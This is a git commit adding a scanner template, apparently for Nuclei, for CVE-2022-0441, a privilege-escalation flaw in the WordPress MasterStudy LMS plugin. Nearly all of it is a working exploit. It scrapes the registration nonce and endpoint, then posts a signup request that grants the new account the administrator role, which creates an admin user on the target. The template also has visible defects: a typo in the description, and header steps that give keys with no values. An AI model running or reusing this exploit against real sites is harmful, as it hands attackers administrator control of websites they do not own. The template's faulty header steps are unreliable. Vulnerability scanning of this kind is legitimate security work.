Add CVE-2022-0441

2022-06-30 14:40:45 +07:00 · 2022-06-30 14:40:45 +07:00 · b81f5c8c68
parent 72d3f332fa
commit b81f5c8c68
1 changed files with 102 additions and 0 deletions
--- a/cves/2022/CVE-2022-0441.yaml
+++ b/cves/2022/CVE-2022-0441.yaml
@ -0,0 +1,102 @@
+id: CVE-2022-0441
+
+info:
+  name: WordPress MasterStudy LMS Plugin Privilege Escalation
+  author: dwisiswant0
+  severity: critical
+  description: |
+    The MasterStudy LMS WordPress plugin before 2.7.6 does to
+    validate some parameters given when registering a new account,
+    allowing unauthenticated users to register as an admin.
+  reference:
+    - https://wpscan.com/vulnerability/173c2efe-ee9c-4539-852f-c242b4f728ed
+  remediation: Upgrade to version >= 2.7.6.
+  tags: cve,cve2022,wordpress,privx,headless
+
+variables:
+  username: "{{to_lower(rand_text_alphanumeric(6))}}"
+  password: "{{rand_text_alphanumeric(8)}}"
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{BaseURL}}/"
+
+      - action: waitload
+
+      - action: script
+        name: nonce
+        code: "stm_lms_nonces.stm_lms_register"
+
+      - action: script
+        name: endpoint
+        code: "stm_lms_ajaxurl"
+
+      - action: setmethod
+        args:
+          part: request
+          method: POST
+
+      - action: setheader
+        args:
+          part: request
+          key: X-Requested-With
+
+      - action: setheader
+        args:
+          part: request
+          key: application/json
+
+      - action: setbody
+        args:
+          part: request
+          body: |
+            {
+              "user_login": "{{username}}",
+              "user_email": "{{username}}@{{to_lower(rand_text_alphanumeric(6))}}.com",
+              "user_password": "{{password}}",
+              "user_password_re": "{{password}}",
+              "become_instructor": "",
+              "privacy_policy": true,
+              "degree": "",
+              "expertize": "",
+              "auditory": "",
+              "additional": [],
+              "additional_instructors": [],
+              "profile_default_fields_for_register": {
+                "wp_capabilities": {
+                  "value": {
+                    "administrator": 1
+                  }
+                }
+              }
+            }
+
+      - action: navigate
+        name: register
+        args:
+          url: "{{endpoint}}?action=stm_lms_register&nonce={{nonce}}"
+
+      - action: waitload
+
+      - action: script
+        name: status
+        code: "status" # extract JSON object response
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        part: nonce
+        dsl:
+          - "nonce != ''"
+
+      - type: dsl
+        part: endpoint
+        dsl:
+          - "endpoint != ''"
+
+      - type: dsl
+        part: status
+        dsl:
+          - "status == 'success'"